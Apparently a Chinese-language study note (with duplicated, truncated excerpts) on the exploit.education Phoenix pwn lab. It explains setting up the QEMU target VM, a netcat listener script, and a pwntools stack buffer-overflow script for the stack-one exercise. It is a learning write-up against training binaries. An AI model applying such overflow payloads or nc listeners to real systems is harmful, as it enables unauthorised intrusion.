这两道非常简单，而且只有数据读入方式的区别。跟zero一样，只是对覆盖的数据有要求。Unsupported embedstack-one将程序第一个参数strcpy到字符串。notion image在gdb中run后面直接接参数即可带上参数。 pwntools的sh.run可以接收字节数组作为参数，里面可包含启动参数。（看了下文档，对于run方法：Backward compatibility. Use system() ）from pwn import * shell = ssh("user", "localhost", password="user", port=2222) s = b"a" * 0x40 + p32(0x496c5962) sh = shell.run(b"/opt/phoenix/amd64/stack-one " + s) print(sh.recvlines(2)) Unsupported embedstack-two这次是写到环境变量里。notion image做到这里发现环境变量里写"\0"进去会出问题，我们要求写入的是32位数据，不应该用p64，用...

这两道非常简单，而且只有数据读入方式的区别。跟zero一样，只是对覆盖的数据有要求。Unsupported embedstack-one将程序第一个参数strcpy到字符串。notion image在gdb中run后面直接接参数即可带上参数。 pwntools的sh.run可以接收字节数组作为参数，里面可包含启动参数。（看了下文档，对于run方法：Backward compatibility. Use system() ）from pwn import * shell = ssh("user", "localhost", password="user", port=2222) s = b"a" * 0x40 + p32(0x496c5962) sh = shell.run(b"/opt/phoenix/amd64/stack-one " + s) print(sh.recvlines(2)) Unsupported embedstack-two这次是写到环境变量里。notion image做到这里发现环境变量里写"\0"进去会出问题，我们要求写入的是32位数据，不应该用p64，用...

找到一个学习pwn的项目http://exploit.education ，决定让我临时抱佛脚学的pwn走向正轨，试试开个笔记系列（每次pwntools脚本都忘记怎么写），希望不要半路弃坑。定个小目标，至少把Phoenix系列做完吧。环境配置首先在more-downloads里下载phoenix的虚拟机系统镜像，根据你的架构选择。这就是靶机。在启动之前，我们需要安装qemu-system-x86 （64位的也在同一个包里（archlinux）） 运行boot-balabala.sh启动虚拟机，默认在2222端口开启ssh。用户名和密码都是user。 如果你想使用netcat来转发里面的程序，只需在启动脚本里添加另一个端口转发，这里放网络那一整行为例。-netdev user,id=unet,hostfwd=tcp:127.0.0.1:2222-:22,hostfwd=tcp:127.0.0.1:3333-:3333 然后在虚拟机里执行mkfifo io 并创建一个脚本文件（start.sh）#!/bin/bash cat io|$1 -i 2>&1|nc -l 3333...

找到一个学习pwn的项目http://exploit.education ，决定让我临时抱佛脚学的pwn走向正轨，试试开个笔记系列（每次pwntools脚本都忘记怎么写），希望不要半路弃坑。定个小目标，至少把Phoenix系列做完吧。环境配置首先在more-downloads里下载phoenix的虚拟机系统镜像，根据你的架构选择。这就是靶机。在启动之前，我们需要安装qemu-system-x86 （64位的也在同一个包里（archlinux）） 运行boot-balabala.sh启动虚拟机，默认在2222端口开启ssh。用户名和密码都是user。 如果你想使用netcat来转发里面的程序，只需在启动脚本里添加另一个端口转发，这里放网络那一整行为例。-netdev user,id=unet,hostfwd=tcp:127.0.0.1:2222-:22,hostfwd=tcp:127.0.0.1:3333-:3333 然后在虚拟机里执行mkfifo io 并创建一个脚本文件（start.sh）#!/bin/bash cat io|$1 -i 2>&1|nc -l 3333...

world

world